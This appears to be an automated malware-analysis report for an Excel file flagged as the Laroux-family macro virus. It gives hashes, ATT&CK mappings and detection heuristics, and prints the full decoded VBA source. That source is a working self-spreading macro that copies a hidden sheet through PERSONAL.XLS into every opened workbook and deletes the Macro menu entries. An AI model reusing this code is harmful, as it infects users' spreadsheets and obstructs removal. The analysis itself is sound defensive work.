Xls.Trojan.Laroux-27 — Office (OLE) malware analysis

Static analysis result for SHA-256 91727a65c6b4a59f…

MALICIOUS

Office (OLE)

32.0 KB Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: e21ad9bc84550a12dc00fdc0822841b3 SHA-1: 7184ba4ec695aa5e9c244263a543d3ec7919e222 SHA-256: 91727a65c6b4a59f83dda63b1ef570d2ec539157ef3c87b53893ed1dd19bc095
180 Risk Score

Malware Insights

Xls.Trojan.Laroux-27 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is detected as Xls.Trojan.Laroux-27 by ClamAV. It contains a VBA macro with an Auto_Open subroutine that attempts to establish persistence by creating or modifying the PERSONAL.XLS file in the Excel startup path. This macro is designed to run automatically when Excel is opened.

Heuristics 3

  • ClamAV: Xls.Trojan.Laroux-27 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-27
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2271 bytes
SHA-256: 47b7375f9d1808813466da0870fa61c9638e24d3fdcafcac62c950f855af6320
Detection
ClamAV: Xls.Trojan.Laroux-27
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "guyan"


Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "al_muskilat"
End Sub


Sub al_muskilat()
Attribute al_muskilat.VB_ProcData.VB_Invoke_Func = " \n14"
' *****************************************************************
' Name    : ExcelMacro.al_muskilat
' Origin  : England
' Created : January 01, 1997
' Author  : Pyro [VBB]
' *****************************************************************
On Error GoTo ErrorHandler
Application.ScreenUpdating = False
Application.DisplayAlerts = False
Installed = 0
If ThisWorkbook.Name <> "PERSONAL.XLS" Then
If Dir(Application.StartupPath + "\PERSONAL.XLS") = "PERSONAL.XLS" Then Installed = 1
If Installed = 1 Then
GoTo ErrorHandler
Else
Workbooks.Add.SaveAs FileName:=Application.StartupPath + "\PERSONAL.XLS"
Workbooks(ThisWorkbook.Name).Sheets("guyan").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
Workbooks("PERSONAL.XLS").Sheets("guyan").Visible = False
Workbooks("PERSONAL.XLS").Save
Windows("PERSONAL.XLS").Visible = False
End If
Else
Windows("PERSONAL.XLS").Visible = False
For I = 1 To Workbooks(ActiveWorkbook.Name).Sheets.Count
If Workbooks(ActiveWorkbook.Name).Sheets(I).Name = "guyan" Then Installed = 1
Next
If Installed = 1 Then
GoTo ErrorHandler
Else
Workbooks("PERSONAL.XLS").Sheets("guyan").Copy Before:=Workbooks(ActiveWorkbook.Name).Sheets(1)
Workbooks(ActiveWorkbook.Name).Sheets("guyan").Visible = False
Workbooks(ActiveWorkbook.Name).Save
Windows("PERSONAL.XLS").Visible = False
End If
End If
Workbooks("PERSONAL.XLS").Save
Application.ScreenUpdating = True
Application.DisplayAlerts = True
If Day(Now()) = Int((31 * Rnd) + 1) Then MsgBox "You've Been Infected By Guyan!", 16, "Ha....Ha....Ha... [VBB]"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
ErrorHandler:
On Error Resume Next
Err = 0
Workbooks(ActiveWorkbook.Name).Sheets("guyan").Visible = False
On Error GoTo 0
End Sub